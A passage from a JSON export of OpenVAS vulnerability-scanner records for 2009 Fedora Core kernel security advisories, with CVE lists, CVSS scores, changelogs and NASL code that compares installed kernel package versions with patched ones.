isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:58", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8647.", "cvss3": {}, "published": 
"2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8647 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2008-5079", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-1897"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64703", "href": "http://plugins.openvas.org/nasl.php?oid=64703", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8647.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8647 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nFix sock_sendpage null pointer dereference. 
CVE-2009-2692.\n\nChangeLog:\n\n* Fri Aug 14 2009 Kyle McMartin 2.6.27.29-170.2.79\n- CVE-2009-2692: Fix sock sendpage NULL ptr deref.\n* Fri Jul 31 2009 Chuck Ebbert 2.6.27.29-170.2.78\n- The kernel package needs to override the new rpm %install behavior.\n* Thu Jul 30 2009 Chuck Ebbert 2.6.27.29-170.2.77\n- Linux 2.6.27.29\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.29-170.2.75.rc1\n- Linux 2.6.27.29-rc1 (CVE-2009-2406, CVE-2009-2407)\n- Drop linux-2.6-netdev-r8169-avoid-losing-msi-interrupts.patch, now in -stable.\n* Wed Jul 29 2009 Chuck Ebbert 2.6.27.28-170.2.74\n- Don't bounce virtio_blk requests (#510304)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8647\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-8647.\";\n\n\n\nif(description)\n{\n script_id(64703);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8647 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=516949\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.29~170.2.79.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:55", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-9044.", "cvss3": {}, "published": 
"2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-9044 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2767", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2848", "CVE-2009-1897", "CVE-2009-2695", "CVE-2009-2847", "CVE-2009-2849", "CVE-2009-2691"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64736", "href": "http://plugins.openvas.org/nasl.php?oid=64736", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_9044.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-9044 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nSecurity fixes:\n\n- CVE-2009-2691: Information disclosure in proc filesystem\n- CVE-2009-2848: execve: must clear current->child_tid\n- CVE-2009-2849: md: null pointer dereference\n- CVE-2009-2847: Information leak in do_sigaltstack\n\nRestore missing LIRC drivers, dropped in previous release.\nBackport upstream fixes that further improve the security of\nmmap of low addresses. (CVE-2009-2695)\n\nChangeLog:\n\n* Thu Sep 24(??!!) 2009 Chuck Ebbert 2.6.29.6-217.2.16\n- Fix CVE-2009-2691: local information disclosure in /proc\n* Fri Aug 21 2009 David Woodhouse \n- Fix b43 on iMac G5 (#514787)\n* Tue Aug 18 2009 Kyle McMartin \n- CVE-2009-2848: execve: must clear current->clear_child_tid\n- Cherry pick upstream commits 52dec22e739eec8f3a0154f768a599f5489048bd\nwhich improve mmap_min_addr.\n- CVE-2009-2849: md: avoid dereferencing null ptr when accessing suspend\nsysfs attributes.\n- CVE-2009-2847: do_sigaltstack: avoid copying 'stack_t' as a structure\nto userspace\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-9044\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-9044.\";\n\n\n\nif(description)\n{\n script_id(64736);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2691\", \"CVE-2009-2848\", \"CVE-2009-2849\", \"CVE-2009-2847\", \"CVE-2009-2695\", \"CVE-2009-2767\", \"CVE-2009-2692\", \"CVE-2009-1897\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-9044 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=516171\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515423\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=518132\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515392\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=517830\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", 
rpm:\"kernel-PAE-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != 
\"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:47", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-9044.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-9044 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-2767", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2848", "CVE-2009-1897", "CVE-2009-2695", "CVE-2009-2847", "CVE-2009-2849", "CVE-2009-2691"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064736", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064736", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_9044.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-9044 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nSecurity fixes:\n\n- CVE-2009-2691: Information disclosure in proc filesystem\n- CVE-2009-2848: execve: must clear current->child_tid\n- CVE-2009-2849: md: null pointer dereference\n- CVE-2009-2847: Information leak in do_sigaltstack\n\nRestore missing LIRC drivers, dropped in previous release.\nBackport upstream fixes that further improve the security of\nmmap of low addresses. (CVE-2009-2695)\n\nChangeLog:\n\n* Thu Sep 24(??!!) 2009 Chuck Ebbert 2.6.29.6-217.2.16\n- Fix CVE-2009-2691: local information disclosure in /proc\n* Fri Aug 21 2009 David Woodhouse \n- Fix b43 on iMac G5 (#514787)\n* Tue Aug 18 2009 Kyle McMartin \n- CVE-2009-2848: execve: must clear current->clear_child_tid\n- Cherry pick upstream commits 52dec22e739eec8f3a0154f768a599f5489048bd\nwhich improve mmap_min_addr.\n- CVE-2009-2849: md: avoid dereferencing null ptr when accessing suspend\nsysfs attributes.\n- CVE-2009-2847: do_sigaltstack: avoid copying 'stack_t' as a structure\nto userspace\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-9044\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-9044.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64736\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2691\", \"CVE-2009-2848\", \"CVE-2009-2849\", \"CVE-2009-2847\", \"CVE-2009-2695\", \"CVE-2009-2767\", \"CVE-2009-2692\", \"CVE-2009-1897\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-9044 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=516171\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515423\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=518132\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=515392\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=517830\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", 
rpm:\"kernel-PAE-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.29.6~217.2.16.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != 
\"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:09", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-10165.", "cvss3": {}, "published": "2009-10-06T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-10165 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-3001", "CVE-2008-5079", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-2407", "CVE-2009-3002", "CVE-2009-2406", "CVE-2009-2903", "CVE-2009-1897", "CVE-2009-2847"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:64999", "href": "http://plugins.openvas.org/nasl.php?oid=64999", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_10165.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-10165 